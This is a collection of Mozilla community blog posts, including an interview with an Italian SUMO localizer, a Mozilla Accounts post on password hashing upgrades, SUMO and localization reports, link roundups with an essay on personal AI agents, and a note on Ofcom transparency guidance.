I see my contribution to Mozilla a bit like participating in the realization of a project, the tools change but I believe the final goal is the same: helping to build a beautiful house where people feel comfortable, where they live well, where there are common spaces, but also personal spaces where privacy must be the priority.

Q: Hi Michele, can you tell us more about yourself and what keeps you busy these days?

I live in Gemona del Friuli, a small town in the Friuli Venezia Giulia region, in the north-east of Italy, bordering Austria and Slovenia. I am a freelance architect, having graduated from Venice’s University many years ago. I own a professional studio and I mainly deal with residential planning, renovations, and design. In my free time I like to draw, read history, art, literature, satire and comics, listen to music, take care of my cats and, of course, translate or update SUMO Knowledge Base articles into Italian.

When I was younger, I played many sports (skiing, basketball, rugby, and athletics). When I can, I continue to go skiing in the beautiful mountains of my region. Oh, I also played piano in a jazz rock band I co-founded in the late 70s and early 80s (good times). In this period, from a professional point of view, I am trying to survive the absurd bureaucracy that is increasingly oppressive in my working environment. As for SUMO, I am maintaining the Italian KB at 100% of the translations, and supporting new localizers to help them align with our translation style.

Q: You get started with the Italian local forum in 2006 before you expand your contribution to SUMO in 2008. Can you tell us more about what are the different types of contributions that you’re doing for Mozilla?

I found out about Firefox in November 2005 and discovered the Mozilla Italia community and their support forum. Initially, I used the forum to ask for help from other volunteers and, after a short time, I found myself personally involved in providing online assistance to Italian users in need. Then I became a moderator of the forum and in 2008, with the help of my friend @Underpass, I started contributing to the localization of SUMO KB articles (the KB was born in that year). It all started like that.

Today, I am an Italian locale leader in SUMO. I take care of the localization of KB articles and train new Italian localizers. I continue to provide support to users on the Italian forums and when I manage to solve a problem I am really happy, but my priority is the SUMO KB because it is an essential source to help users who search online for an immediate solution to any problem encountered with Firefox on all platforms and devices or with Thunderbird, and want to learn the various features of Mozilla applications and services. Forum support has also benefited greatly from KB articles because, instead of having to write down all the procedures to solve a user’s problem every time, we can simply provide them with the link to the article that could solve the problem without having to write the same things every time, especially when the topic has already been discussed many times, but users have not searched our forum.

Q: In addition to translating articles on SUMO, you’re also involved in product translation on Pontoon. With your experience across both platforms, what do you think SUMO can learn from Pontoon, and how can we improve our overall localization process?

I honestly don’t know, they are quite different ways of doing things in terms of using translation tools specifically. I started collaborating with Pontoon’s Italian l10n team in 2014… Time flies… The rules, the style guides, and the QA process adopted for the Italian translations on Pontoon are the same ones we adopted for SUMO. I have to say that I am much more comfortable with SUMO’s localization process and tool, maybe because I have seen it start off, grow and evolve over time. Pontoon introduced Pretranslation, which helps a lot in translating strings, although it still needs improvements. A machine translation of strings that are not already in Pontoon’s “Translation Memory” is proposed. Sometimes that works fine, other times we need to correct the proposal and save it after escalating it on GitHub, so that in the future that translation becomes part of the “Translation Memory”. If the translation of a string is not accurate, it can be changed at any time.

I don’t know if it can be a solution for some parts of SUMO articles. We already have templates, maybe we should further implement the creation and use of templates, focusing on this tool, to avoid typing the translation of procedures/steps that are repeated identically in many articles.

Q: What are the biggest challenges you’re currently facing as a SUMO contributor? Are there any specific technical issues you think should be prioritized for fixing?

Being able to better train potential new localizers, and help infuse the same level of passion that I have in managing the Italian KB of SUMO. As for technical issues, staying within the scope of translating support articles, I do not encounter major problems in terms of translating and updating articles, but perhaps it is because I now know the strengths and weaknesses of the platform’s tools and I know how to manage them.

Maybe we could find a way to remedy what is usually the most frustrating thing for a contributor/localizer who, for example, is updating an article directly online: the loss of their changes after clicking the “Preview Content” button. That is when you click on the “Preview Content” button after having translated an article to correct any formatting/typing errors. If you accidentally click a link in the preview and don’t right-click the link to select “Open Link in New Tab” from the context menu, the link page opens replacing/overwriting the editing page and if you try to go back everything you’ve edited/translated in the input field is gone forever… And you have to start over. A nightmare that happened to me more than once often because I was in a hurry. I used to rely on a very good extension that saved all the texts I typed in the input fields and that I could recover whenever I wanted, but it is no longer updated for the newer versions of Firefox. I’ve tried others, but they don’t convince me. So, in my opinion, there should be a way to avoid this issue without installing extensions. I’m not a developer, I don’t know if it’s easy to find a solution, but we have Mozilla developers who are great ;)

Maybe there could be a way to automatically save a draft of the edit every “x” seconds to recover it in case of errors with the article management. Sometimes, even the “Preview Content” button could be dangerous. If you accidentally lost your Internet connection and didn’t notice, if you click on that button, the preview is not generated, you lose everything and goodbye products!

Q: Your background as a freelance architect is fascinating! Could you tell us more about that? Do you see any connections between your architectural work and your contribution to Mozilla, or do you view them as completely separate aspects of your life?

As an architect I can only speak from my personal experience, because I live in a small town, in a beautiful region which presents me with very different realities than those colleagues have to deal with in big cities like Rome or Milan. Here everything is quieter, less frenetic, which is sometimes a good thing, but not always. The needs of those who commission a project are different if you have to carry it out in a big city, the goal is the same but, urban planning, local building regulations, available spaces in terms of square footage, market requests/needs, greatly influence the way an architect works. Professionally I have had many wonderful experiences in terms of design and creativity (houses, residential buildings, hotels, renovations of old rural or mountain buildings, etc.), challenges in which you often had to play with just a centimeter of margin to actually realize your project.

Connection between architecture and contribution to Mozilla? Good question. I see my contribution to Mozilla a bit like participating in the realization of a project, the tools change but I believe the final goal is the same: helping to build a beautiful house where people feel comfortable, where they live well, where there are common spaces, but also personal spaces where privacy must be the priority. If someone wants our “cookies” and unfortunately often not only those, they have to knock, ask permission and if we do not want to have intrusive guests, that someone has to turn around, go away and let us do our things without sticking their nose in. This is my idea of ​​Mozilla, this is the reason that pushed me to believe in its values ​​(The user and his privacy first) and to contribute as a volunteer, and this is what I would like to continue to believe even if someone might say that I am naive, that “they are all the same”.

My duty as an architect is like that of a good parent, when necessary I must always warn my clients about why I would advise against certain solutions that I, from professional experience, already know are difficult to implement or that could lead to future management and functionality problems. In any case I always look for solutions that can satisfy my clients’ desires. Design magazines are beautiful, but it is not always possible to reproduce a furnishing solution in living environments that are completely different from the spaces of a showroom set up to perfection for a photo shoot… Mozilla must continue to do what it has always done, educate and protect users, even those who do not use its browser or its products, from those “design magazines” that could lead them to inadvertently make bad choices that they could regret one day.

Q: Can you tell us more about the Italian locale team in SUMO and how do you collaborate with each other?

First of all, it’s a fantastic team! Everyone does what they do best, there are those who help users in need on the forums, those who translate, those who check the translations and do QA by reporting things that need to be corrected or changed, from punctuation errors to lack of fluency or clarity in the translation, those who help with images for articles because often the translator needs the specific image for an operating system that he does not have.

As for translations, which is my main activity, we usually work together with 4- 5 collaborators/friends, and we use a consolidated procedure. Translation of an article, opening a specific discussion for the article in the forum section dedicated to translations with the link of the first translation and the request for QA. Intervention of anyone who wants to report/suggest a correction or a change to be made, modification, link to the new revised version based on the suggestions, rereading and if everything is ok, approval and publication. The translation section is public — like all the other sections of the Mozilla Italia forum — and anyone can participate in the discussion.

We are all friends, volunteers, some of us know each other only virtually, others have had the chance to meet in person. The atmosphere is really pleasant and even when a discussion goes on too long, we find a way to lighten the mood with a joke or a tease. No one acts as the professor, we all learn something new. Obviously, there are those like me who are more familiar with the syntax/markup and the tools of the SUMO Wiki and those who are less, but this is absolutely not a problem to achieve the final result which is to provide a valid guide to users.

Q: Looking back on your contribution to SUMO, what was the most memorable experience for you? Anything that you’re most proud of?

It’s hard to say… I’m not a tech geek, I don’t deal with code, scripts or computer language so my contribution is limited to translating everything that can be useful to Italian users of Mozilla products/programs. So I would say: the first time I reached the 100% translation percentage of all the articles in the Italian dashboard. I have always been very active and available over the years with the various Content Managers of SUMO. When I received their requests for collaboration, I did tests, opened bugs related to the platform, and contributed to the developers’ requests by testing the procedures to solve those bugs.

As for the relationship with the Mozilla community, the most memorable experience was undoubtedly my participation in the Europe MozCamp 2009 in Prague, my “first time”, my first meeting with so many people who then became dear friends, not only in the virtual world. I remember being very excited about that invitation and fearful for my English, which was and is certainly not the best. An episode: Prague, the first Mozilla talk I attended. I was trying to understand as much as possible what the speaker was saying in English. I heard this strange word “eltenen… eltenen… eltenen” repeated several times. What did it mean? After a while I couldn’t take it anymore, I turned to an Italian friend who was more expert in the topics discussed and above all who knew the English language well. Q: What the hell does “eltenen” mean? A: “Localization”. Q: “Localization???” A: “l10n… L ten n… L ocalizatio n”. Silence, embarrassment, damn acronyms!

How could I forget my first trip outside of Europe to attend the Mozilla Summit in Whistler, Canada in the summer of 2010? It was awesome, I was much more relaxed, decided not to think about the English language barrier and was able to really contribute to the discussions that we, SUMO localizers and contributors from so many countries around the world, were having to talk about our experience, try to fix the translation platform to make it better for us and discuss all the potential issues that Firefox was having at the time. I really talked a lot and I think the “Mozillians” I interacted with even managed to understand what I was saying in English :)

The subsequent meetings, the other All Hands I attended, were all a great source of enthusiasm and energy! I met some really amazing people!

Q: Lastly, can you share tips for those who are interested in contributing to Italian content localization or contributing to SUMO in general?

Every time a new localizer starts collaborating with us I don’t forget all the help I received years ago! I bend over backwards to put them at ease, to guide them in their first steps and to be able to transmit to them the same passion that was transmitted to me by those who had to review with infinite patience my first efforts as a localizer. So I would say: first of all, you must have passion and a desire to help people. If you came to us it’s probably because you believe in this project, in this way of helping people. You can know the language you are translating from very well, but if you are not driven by enthusiasm everything becomes more difficult and boring. Don’t be afraid to make mistakes, if you don’t understand something ask, you’re among friends, among traveling companions. As long as an article is not published we can correct it whenever we want and even after publication. We were all beginners once and we are all here to learn. Take an article, start translating it and above all keep it updated.

If you are helping on the support forums, be kind and remember that many users are looking for help with a problem and often their problems are frustrating. The best thing to do is to help the user find the answer they are looking for. If a user is rude, don’t start a battle that is already lost. You are not obligated to respond, let the moderators intervene. It is not a question of wanting to be right at all costs but of common sense.

 

Don Martilinks for 29 Oct 2024

Satire Without Purpose Will Wander In Dark Places Broadly labelling the entirety of Warhammer 40,000 as satire is no longer sufficient to address what the game has become in the almost 40 years since its inception. It also fails to answer the rather awkward question of why, exactly, these fascists who are allegedly too stupid to understand satire are continually showing up in your satirical community in the first place.

Why I’m staying with Firefox for now – Michael Kjörling [T]he most reasonable option is to keep using Firefox, despite the flaws of the organization behind it. So far, at least these things can be disabled through settings (for example, their privacy-preserving ad measurement), and those settings can be prepared in advance.

Google accused of shadow campaigns redirecting antitrust scrutiny to Microsoft, Google’s Shadow Campaigns (so wait a minute, Microsoft won’t let companies use their existing Microsoft Windows licenses for VMs in the Google cloud, and Google is doing a sneaky advocacy campaign? Sounds like content marketing for Amazon Linux®

Scripting News My friends at Automattic showed me how to turn on ActivityPub on a WordPress site. I wrote a test post in my simple WordPress editor, forgetting that it would be cross-posted to Mastodon. When I just checked in on Masto, there was the freaking post. After I recovered from passing out, I wondered what happens if I update the post in my editor, and save it to the WordPress site that’s hooked up to Masto via ActivityPub. So I made a change and saved it. I waited and waited, nothing happened. I got ready to add a comment saying ahh I guess it doesn’t update, when—it updated. (Like being happy when a new web site opening in a new browser, a good sign that ActivityPub is the connecting point for this kind of connected innovation.) Related: The Web Is a Customer Service Medium (Ftrain.com) by Paul Ford.

China Telecom’s next 150,000 servers will mostly use local processors Among China Telecom’s server buys this year are machines running processors from local champion Loongson, which has developed an architecture that blends elements of RISC-V and MIPS.

Removal of Russian coders spurs debate about Linux kernel’s politics Employees of companies on the Treasury Department’s Office of Foreign Assets Control list of Specially Designated Nationals and Blocked Persons (OFAC SDN), or connected to them, will have their collaborations subject to restrictions, and cannot be in the MAINTAINERS file.

The TikTokification of Social Media May Finally Be Its Undoing by Julia Angwin. If tech platforms are actively shaping our experiences, after all, maybe they should be held liable for creating experiences that damage our bodies, our children, our communities and our democracy.

Cheap Solar Panels Are Changing the World The latest global report from the International Energy Agency (IEA) notes that solar is on track to overtake all other forms of energy by 2033.

Conceptual models of space colonization - Charlie’s Diary (one more: Kurt Vonnegut’s concept for spreading genetic material)

(protip: you can always close your browser tabs with creepy tech news, there will be more in a few minutes… Location tracking of phones is out of control. Here’s how to fight back. LinkedIn fined $335 million in EU for tracking ads privacy breaches Pinterest faces EU privacy complaint over tracking ads Dems want tax prep firms charged for improper data sharing Dow Jones says Perplexity is “freeriding,” sues over copyright infringement You Have a ‘Work Number’ on This Site, and You Should Freeze It Roblox stock falls after Hindenburg blasts the social gaming platform over bots and pedophiles)

It Was Ten Years Ago Today that David Rosenthal predicted that cryptocurrency networks will be dominated by a few, perhaps just one, large participant.

Writing Projects (good start for a checklist before turning in a writing project. Maybe I should write Git hooks for these.)

Word.(s). (Includes some good vintage car ads. Remember when most car ads were about the car, not just buttering up the driver with how successful you must be to afford this thing?)

Social Distance and the Patent System [I]t was clear from our conversation that [Judge Paul] Michel doesn’t have a very deep understanding of the concerns of many in the software industry. And, more to the point, he clearly wasn’t very interested in understanding those concerns better or addressing them. On a theoretical level, he knew that there was a lot of litigation in the software industry and that a lot of people were upset about it. But like Fed and the unemployment rate, this kind of theoretical knowledge doesn’t always create a sense of urgency. One has to imagine that if people close to Michel—say, a son who was trying to start a software company—were regularly getting hit by frivolous patent lawsuits, he would suddenly take the issue more seriously. But successful software entrepreneurs are a small fraction of the population, and most likely no judges of the Federal Circuit have close relationships with one.

(Rapids is the script that gathers these, and it got a clean bill of health from the feed reader score report after I fixed the Last-Modified/If-Modified-Since and Etag handling. So expect more link dump posts here, I guess.)

Wil ClouserMozilla Accounts password hashing upgrades

We’ve recently finished two significant changes to how Mozilla Accounts handles password hashes which will improve security and increase flexibility around changing emails. The changes are entirely transparent to end-users and are applied automatically when someone logs in.

Randomizing Salts

If a system is going to store passwords, best practice is to hash the password with a unique salt per row. When accounts was first built we used an account’s email address as the unique salt for password hashing. This saved a column in the database and some bandwidth but overall I think was a poor idea. It meant people couldn’t re-use their email addresses and it leaves PII sitting around unnecessarily.

Instead, a better idea is just to generate a random salt. We’ve now transitioned Mozilla Accounts to random salts.

Increasing Key Stretching Iterations

Eight years ago Ryan Kelly filed bug 1320222 to review Mozilla Accounts’ client-side key stretching capabilities and sparked a spirited conversation about iterations and the priority of the bug. Overall, this is routine maintenance - we expect any amount of stretching we do will have to be revisited periodically due to hardware improving and the value we choose is a compromise between security and time to login, particularly on older hardware.

Since we were generating new hashes for the random salts already we took the opportunity to increase our PBKDF2 iterations from 1000 to 650000 – a number we’re seeing others in the industry using. This means logging in with slower hardware (like older mobile phones) may be noticeably slower. Below is an excerpt from the analysis we did showing a Macbook from 2007 will take an additional ~3 seconds to log in:

Key Stretch Iterations Overhead on 2007 Macbook Overhead on 2021 MacBook Pro M1
100,000 0.4800024 seconds 0.00000681 seconds
200,000 0.9581234 seconds 0.00000169 seconds
300,000 1.4539928 seconds 0.00000277 seconds
400,000 1.9337903 seconds 0.00029750 seconds
500,000 2.4146366 seconds 0.00079127 seconds
600,000 2.9482827 seconds 0.00112186 seconds
700,000 3.3960513 seconds 0.00117956 seconds
800,000 3.8675677 seconds 0.00117956 seconds
900,000 4.3614942 seconds 0.00141616 seconds

Implementation

Dan Schomburg did the heavy lifting to make this a smooth and successful project. He built the v2 system alongside v1 so both hashes are generated simultaneously and if the v2 exists the login system will use that. This lets us roll the feature out slowly and gives us control if we need to disable it or roll back.

We tested the code for several months on our staging server before rolling it out in production. When we did enable it in production it was over the course of several weeks via small percentages while we watched for unintended side-effects and bug reports.

I’m pleased to say everything appers to be working smoothly. As always, if you notice any issues please let us know.

Don Martitypefaces that aren’t on this blog (yet?)

Right now I’m not using these, but they look useful and/or fun.

  • Departure Mono: vintage-looking, pixelated, lo-fi technical vibe.

  • Atkinson Hyperlegible Font was carefully developed by the Braille Institute to help low-vision readers. It improves legibility and readability through clear, and distinctive letters and numbers.

I’m trying to keep this site fairly small and fast, so getting by with Modern Font Stacks as much as possible.

Related

colophon

Bonus links

(these are all web development, editing, and business, more or less. Yes, I’m still working on my SCALE proposal, deadline coming up.)

Before you buy a domain name, first check to see if it’s haunted

Discover Wiped Out MFA Spend By Following These Four Basic Steps (This headline underrates the content. If all web advertisers did these tips, then 90% of the evil stuff on the Internet would be gone—most of the web’s problems are funded by advertisers and agencies who fail to pay attention to the context in which their ads appear.)

Janky remote backups without root on the far end

My solar-powered and self-hosted website

Let’s bring back browsing

Hell Gate NYC doubled its subscription revenue in its second year as a worker-owned news outlet

Is Matt Mullenweg defending WordPress or sabotaging it?

Gosub – An open-source browser engine

Take that

Thunderbird Android client is K-9 Mail reborn, and it’s in solid beta

A Bicycle for the Mind – Prologue

Why I Migrated My Newsletter From Substack to Eleventy and Buttondown - Richard MacManus

My Blog Engine is the Erlang Build Tool

A Developer’s Guide to ActivityPub and the Fediverse

Don Martipersonal AI in the rugpull economy

Doc Searls writes, in Personal Agentic AI,

Wouldn’t it be good for corporate AI agents to have customer hands to shake that are also equipped with agentic AI? Wouldn’t those customers be better than ones whose agency is merely human, and limited to only what corporate AI agents allow?

The obvious answer for business decision-makers today is: lol, no, a locked-in customer is worth more. If, as a person who likes to watch TV, you had an AI agent, then the agent could keep track of sports seasons and the availability of movies and TV shows, and turn your streaming subscriptions on and off. In the streaming business, like many others, the management consensus is to make things as hard and manual as possible on the customer side, and save the automation for the company side. Just keeping up with watching a National Football League team is hard…even for someone who is ON the team. Automation asymmetry, where the seller gets to reduce service costs while the customer has to do more and more manual work, is seen as a big win by the decision-makers on the high-automation side.

Big company decision-makers don’t want to let smaller companies have their own agentic tools, either. Getting a DMCA Exemption to let McDonald’s franchisees fix their ice cream machines was a big deal that required a lengthy process with the US Copyright Office. Many other small businesses are locked in to the manual, low-information side of a business relationship with a larger one. (Web advertising is another example. Google shoots at everyone’s feet, and agencies, smaller firms, and browser extension developers dance.)Google employees and shareholders would be better off if it were split into two companies that could focus on useful projects for independent customers who had real choices.

The first wave of user reactions to AI is happening, and it’s adversarial. Artists on sites like DeviantArt went first, and now Reddit users are deliberately posting fake answers to feed Google’s AI. On the shopping side, avoiding the output of AI and made-for-AI deceptive crap is becoming a must-have mainstream skill, as covered in How to find helpful content in a sea of made-for-Google BS and How Apple and Microsoft’s trusted brands are being used to scam you. As Baldur Bjarnason writes,

The public has for a while now switched to using AI as a negative—using the term artificial much as you do with artificial flavouring or that smile’s artificial. It’s insincere creativity or deceptive intelligence.

Other news is even worse. In today’s global conflict between evil oligarchs and everyone else, AI is firmly aligned with the evil oligarch side.

But today’s Big AI situation won’t last. Small-scale and underground AI has sustainable advantages over the huge but money-losing contenders. And it sounds like Doc is already thinking post-bubble.

Adversarial now, but what about later?

So how do we get from the AI adversarial situation we have now to the win-win that Doc is looking for? Part of the answer will be resolving the legal issues. Today’s Napster-like free-for-all environment won’t persist, so eventually we will have an AI scene in which companies that want to use your work for training have to get permission and disclose provenance.

The other part of the path from today’s situation—where big companies have AI that enables scam culture and chickenization while individuals and small companies are stuck rowing through funnels and pipelines—is personal, aligned AI that balances automation asymmetries. Whether it’s solving CAPTCHAs, getting data in hard-to-parse formats, or other awkward mazes, automation asymmetries mean that as a customer, you technically have more optionality than you practically have time to use. But AI has a lot more time. If a company gives you user experience grief, with the right tools you can get back to where you would have been if they had applied less obfuscation in the first place. (icymi: Video scraping: extracting JSON data from a 35 second screen capture for less than 1/10th of a cent Not a deliberate obfuscation example, but an approach that can be applied.)

So we’re going to see something like this AI cartoon by Tom Fishburne (thanks to Doc for the link) for privacy labour. Companies are already getting expensive software-as-a-service to make privacy tasks harder for the customers, which means that customers are going to get AI services to make it easier. Eventually some companies will notice the extra layers, pay attention to the research, and get rid of the excess grief on their end so you can stop running de-obfuscation on your end. That will make it work better for everyone. (GPC all the things! Data Rights Protocol)

The biggest win from personal AI will, strangely enough, be in de-personalizing your personal information environment. By doing the privacy labour for you, the agentic AI will limit your addressability and reduce personalization risks. The risks to me from buying the less suitable of two legit brands are much lower than the risk of getting stuck with some awful crap that was personalized to me and not picked up on by norms enforcers like Consumer Reports. Getting more of my privacy labour done for me will not just help me personally do better #mindfulConsumption, but also increase the rewards for win-win moves by sellers. Personalization might be nifty, but filtering out crap and rip-offs is a bigger immediate win: Sunday Internet optimism Doc writes, When you limit what customers can bring to markets, you limit what can happen in those markets. As far as I can tell, the real promise for agentic AI isn’t just in enabling existing processes or making them more efficient. It’s in establishing a credible deterrent to enshittification—if you’re trying to rip me off, don’t talk to me, talk to my bot army.

For just a minute, put yourself in the shoes of a product manager with a proposal for some legit project that they’re trying to get approved. If that proposal is up against a quick win for the company, like one based on creepy surveillance, it’s going to lose. But if the customers have the automation power to lower the ROI from creepy growth hacking, the legit project has a chance. And that pushes up the long-term value of the entire company. An individual locked-in customer is more valuable to the brand than an individual independent customer, but a brand with independent customers is more valuable than a brand with an equal number of locked-in customers.

Anyway, hope to see you at VRM Day.

Bonus links

Space is Dead. Why Do We Keep Writing About It?

It’s Time to Build the Exoplanet Telescope

The tech startups shaking up construction in Europe

Support.Mozilla.OrgWhat’s up with SUMO – Q3 2024

Each quarter, we gather insights on all things SUMO to celebrate our team’s contributions and showcase the impact of our work.

The SUMO community is powered by an ever-growing global network of contributors. We are so grateful for your contributions, which help us improve our product and support experiences, and further Mozilla’s mission to make the internet a better place for everyone.

This quarter we’re modifying our update to highlight key takeaways, outline focus areas for Q4, and share our plans to optimize our tools so we can measure the impact of your contributions more effectively.

Below you’ll find our report organized by the following sections: Q3 Highlights at-a-glance, an overview of our Q4 Priorities & Focus Areas, Contributor Spotlights and Important Dates, with a summary of special events and activities to look forward to! Let’s dive right in:

Q3 Highlights at-a-glance

Forums: We saw over 13,000 questions posted to SUMO in Q3, up 83% from Q2. The increased volume was largely driven by the navigation redesign in July.

  • We were able to respond to over 6,300 forum questions, a 49% increase from Q2!
  • Our response rate was ~15 hours, which is a one-hour improvement over Q2, with a helpfulness rating of 66%.
  • August was our busiest and most productive month this year. We saw more than 4,300 questions shared in the forum, and we were able to respond to 52.7% of total in-bounds.
  • Trends in forum queries included questions about site breakages, account and data recovery concerns, sync issues, and PPA feedback.

Knowledge Base: We saw 473 en-US revisions from 45 contributors, and more than 3,000 localization revisions from 128 contributors which resulted in an overall helpfulness rating of 61%, our highest quarterly average rating YTD!

  • Our top contributor was AliceWyman. We appreciate your eagle eyes and dedication to finding opportunities to improve our resources.
  • For localization efforts, our top contributor was Michele Rodaro. We are grateful for your time, efforts and expert language skills.

Social: On our social channels, we interacted with over 1,100 tweets and saw more than 6,000 app reviews.

  • Our top contributor on Twitter this quarter was Isaac H who responded to over 200 tweets, expertly navigating our channels to share helpful resources, provide troubleshooting support, and help redirect feature requests to Mozilla Connect. Thank you, Isaac!
  • On the play store, our top contributor was Dmitry K who replied to over 400 reviews! Thank you for giving helpful feedback, advice and for providing such a warm and welcoming experience for users.

SUMO platform updates: There were 5 major platform updates in Q3. Our focus this quarter was to improve navigation for users by introducing new standardized topics across products, and update the forum moderation tool to allow our support agents to moderate these topics for forum posts. Categorizing questions more accurately with our new unified topics will provide us with a foundation for better data analysis and reporting.

We also introduced improvements to our messaging features, localized KB display times, fixed a bug affecting pageviews in the KB dashboard, and added a spam tag to make moderation work easier for the forum moderators.

We acknowledge there was a significant increase in spam questions that began in July which is starting to trend downwards. We will continue to monitor the situation closely, and are taking note of moderator recommendations on a future resolution. We appreciate your efforts to help us combat this problem!

Check out SUMO Engineering Board to see what the platform team is cooking up in the engine room. You’re welcome to join our monthly Community Calls to learn more about the latest updates to Firefox and chat with the team.

Firefox Releases: We released Firefox 128, Firefox 129 and Firefox 130 in Q3 and we made significant updates to our wiki template for the Firefox train release.

Q4 Priorities & Focus Areas

  • CX: Enhancing the user experience and streamlining support operations.
  • Kitsune: Improved article helpfulness survey and tagging improvements to help with more granular content categorization.
  • SUMO: For the rest of 2024, we’re working on an internal SUMO Community Report, FOSDEM 2025 preparation, Firefox 20th anniversary celebration, and preparing for an upcoming Community Campaign around QA.

Contributor Spotlights

We have seen 37 new contributors this year, with 10 new contributors joining the team this quarter. Among them, ThePillenwerfer, Khalid, Mozilla-assistent, and hotr1pak, who shared more than 100 contributions between July–September. We appreciate your efforts!

Cheers to our top contributors this quarter:

SUMO top contributors in Q3

Our multi-channel contributors made a significant impact by supporting the community across more than one channel (and in some cases, all three!) 

All in all it was an amazing quarter! Thanks for all you do.

Important dates

  • October 29th: Firefox 132 will be released
  • October 30th: RSVP to join our next Community Call! All are welcome. We do our best to create a safe space for everyone to contribute. You can join on video or audio, at your discretion. You are also welcome to share questions in advance via the contributor forum, or our Matrix channel.
  • November 9th: Firefox’s 20th Birthday!
  • November 14th Save the date for an AMA with the Firefox leadership team
  • FOSDEM ’25: Stay tuned! We’ll put a call out for volunteers and for talks in early November

Stay connected

Thanks for reading! If you have any feedback or recommendations on future features for this update, please reach out to Kiki and Andrea.

Mozilla Localization (L10N)L10n report: October 2024 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

New community/locales added

We’re grateful for the Abzhaz community’s initiative in reaching out to localize our products. Thank you for your valuable involvement!

New content and projects

What’s new or coming up in Firefox desktop

Search Mode Switcher

A new feature in development has become available (behind a flag) with the release of the latest Nightly version 133: the Search Mode Switcher. You may have already seen strings for this land in Pontoon, but this feature enables you to enter a search term into the address bar and search through multiple engines. After entering the search term and selecting a provider, the search term will persist (instead of showing the site’s URL) and then you can select a different provider by clicking an icon on the left of the bar.

Firefox Search Mode Switcher

You can test this now in version 133 of Nightly by entering about:config in the address bar and pressing enter, proceed past the warning, and search for the following flag: browser.urlbar.scotchBonnet.enableOverride. Toggling the flag to true will enable the feature.

New profile selector

Starting in Version 134 of Nightly a new feature to easily select, create, and change profiles within Firefox will begin rolling out to a small number of users worldwide. Strings are planned to be made available for localization soon.

Sidebar and Vertical Tabs

Finally, as previously mentioned in the previous L10n Report, features for a new sidebar with expanded functionality along with the ability to change your tab layout from horizontal to vertical are available to test in Nightly through the Firefox Labs feature in your settings. Just go to your Nightly settings, select the Firefox Lab section from the left, and enable the feature by clicking the checkbox. Since these are experimental there may continue to be occasional string changes or additions. While you check out these features in your languages, if you have thoughts on the features themselves, we welcome you to share feedback through Mozilla Connect.

What’s new or coming up in web projects

AMO and AMO Frontend

To improve user experience, the AMO team plans to implement changes that will enable only locales meeting a specific completion threshold. Locales with very low completion percentages will be disabled in production but will remain available on Pontoon for teams to continue working on them. The exact details and timeline will be communicated once the plan is finalized.

Mozilla Accounts

Currently Mozilla Accounts is going through a redesign of some of its log-in pages’ user experiences. So we will continue to see small updates here and there for the rest of the year. There is also a planned update to the Mozilla Accounts payment sub platform. We expect to see a new file added to the project before the end of the year – but a large number of the strings will be the same as now. We will be migrating those translations so they don’t need to be translated again, but there will be a number of new strings as well.

Mozilla.org

The Mozilla.org site is undergoing a series of redesigns, starting with updates to the footer and navigation bars. These changes will continue through the rest of the year and beyond. The next update will focus on the About page. Additionally, the team is systematically removing obsolete strings and replacing them with updated or new strings, ensuring you have enough time to catch up while minimizing effort on outdated content.

There are a few new Welcome pages made available to a select few locales. Each of these pages have a different deadline. Make sure to complete them before they are due.

What’s new or coming up in SUMO

The SUMO platform just got a navigation redesign in July to improve navigation for users & contributors. The team also introduced new topics that are standardized across products, which lay the foundation for better data analysis and reporting. Most of the old topics, and their associated articles and questions, have been mapped to the new taxonomy, but a few remain that will be manually mapped to their new topics.

On the community side, we also introduced improvements & fixes on the messaging feature, changing the KB display time in format appropriate to locale, fixed the bug so we can properly display pageviews number in the KB dashboard, and add a spam tag in the list of question if it’s marked as spam to make moderation work easier for the forum moderators.

There will be a community call coming up on Oct 30 at 5pm UTC where we will be talking about Firefox 20th anniversary celebration and Firefox 132 release. Check out the agenda for more detail.

What’s new or coming up in Pontoon

Enhancements to Pontoon Search

We’re excited to announce that Pontoon now allows for more sophisticated searches for strings, thanks to the addition of the new search panel!

When searching for a string, clicking on the magnifying glass icon will open a dropdown, allowing users to select any combination of search options to help refine their search. Please note that the default search behavior has changed, as string identifiers must now be explicitly enabled in search options.

Pontoon Enhanced Search Options

User status banners

As part of the effort to introduce badges/achievements into Pontoon, we’ve added status banners under user avatars in the translation workspace. Status banners reflect the permissions of the user within the respective locale and project, eliminating the need to visit their profile page to view their role.

Namely, team managers will get the ‘MNGR’ tag, translators get the ‘TRNSL’ tag, project managers get the ‘PM’ tag, and those with site-wide admin permissions receive the ‘ADMIN’ tag. Users who have joined within the last three months will get the ‘NEW USER’ tag for their banner. Status banners also appear in comments made under translations.

Screenshot of Pontoon showing the Translate UI, with user displaying the new banner for Manager and AdminNew Pontoon logo

We hope you love the new Pontoon logo as much as we do! Thanks to all of you who expressed your preference by participating in the survey.

Pontoon New Logo

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve it.

Mozilla Privacy BlogMozilla Participates to Ofcom’s Draft Transparency Reporting Guidance

On 4th October 2024, Mozilla provided our input to Ofcom’s consultation on its draft transparency reporting guidance. Transparency plays a crucial role in promoting accountability and public trust, particularly when it comes to how tech platforms handle harmful or illegal content online and we were pleased to share our research, insight, and input with Ofcom.

Scope of the Consultation

Ofcom’s proposed guidance aims to improve transparency reporting, allowing the public, researchers, and regulators to better understand how categorized services operate and whether they are doing enough to respect users’ rights and protect users from harm.

We support this effort and believe additional clarifications are needed to ensure that Ofcom’s transparency process fully meets its objectives. The following clarifications will ensure that the transparency reporting process effectively holds tech companies accountable, safeguards users, fosters public trust, and allows for effective use of transparency reporting by different stakeholders.

The Importance of Standardization

One of our key recommendations is the need for greater standardization in transparency elements. Mozilla’s research on public ad repositories developed by many of the largest online platforms finds that there are large discrepancies across these transparency tools, making it difficult for researchers and regulators to compare information across platforms.

Ofcom’s guidance must ensure that transparency reports are clear, systematic, and easy to compare year-to-year. We recommend that Ofcom provide explicit guidelines on the specific data platforms must provide in their transparency reports and the formats in which they should be reported. This will enable platforms to comply uniformly and make it easier for regulators and researchers to monitor patterns over time.

In particular, we encourage Ofcom to distinguish between ‘core’ and ‘thematic’ information in transparency reports. We understand that core information will be required consistently every year, while thematic data will focus on specific regulatory priorities, such as emerging areas of concern. However, it is important that platforms are given enough advance notice to prepare their systems for thematic information to avoid any disproportionate compliance burden. This is particularly important for smaller businesses who have limited resources and may find it challenging to comply with new reporting criteria, compared to big tech companies.

